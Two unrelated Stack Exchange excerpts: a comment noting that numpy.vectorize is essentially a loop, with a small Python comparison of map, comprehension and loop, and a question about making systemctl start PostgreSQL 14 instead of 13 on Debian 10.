@PrasKam no problem. I myself only recently discovered numpy.vectorize, so I thought it may be good to mention as well.

From the docs of np.vectorize: "The vectorize function is provided primarily for convenience, not for performance. The implementation is essentially a for loop." Consider editing the answer to highlight that.
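The "same ballpark" claim about map, loops, and comprehensions is easy to sanity-check without numpy (a sketch using math.sqrt; in practice np.sqrt(x) + 1 on an array would replace all three):

```python
import math

def sumnum(v):
    # Scalar version of the operation from the question: sqrt(v) + 1.
    return math.sqrt(v) + 1

x = [1, 3, 45, 45, 56, 545, 67]

# Three equivalent element-wise applications; all of them loop in the
# interpreter, so their performance is comparable. True vectorization
# (np.sqrt(x) + 1) pushes the loop into compiled C code instead.
via_map = list(map(sumnum, x))
via_comp = [sumnum(v) for v in x]
via_loop = []
for v in x:
    via_loop.append(sumnum(v))

print(via_map == via_comp == via_loop)  # True
```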
common-pile/stackexchange_filtered
How do I change to the new server version?

I have versions 13 and 14 of PostgreSQL installed on my system. When I start the server using systemctl start postgresql, it always starts version 13. The client application shows version 14:

# psql -V
psql (PostgreSQL) 14.1 (Debian 14.1-1.pgdg100+1)

But the database tells me the server running is version 13:

# select version();
                                                      version
------------------------------------------------------------------------------------------------------------------
 PostgreSQL 13.5 (Debian 13.5-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit
(1 row)

I found the systemd template unit file postgresql@.service, but it refers to the version as the variable %I. There is a comment at the top of the file that says:

# variable %i expands to "version-cluster", %I expands to "version/cluster".

What sets that version number? How do I get it to start version 14 when I run systemctl start postgresql? Ideally, I would like to know how to switch back and forth between versions. I am running Debian 10.11.
common-pile/stackexchange_filtered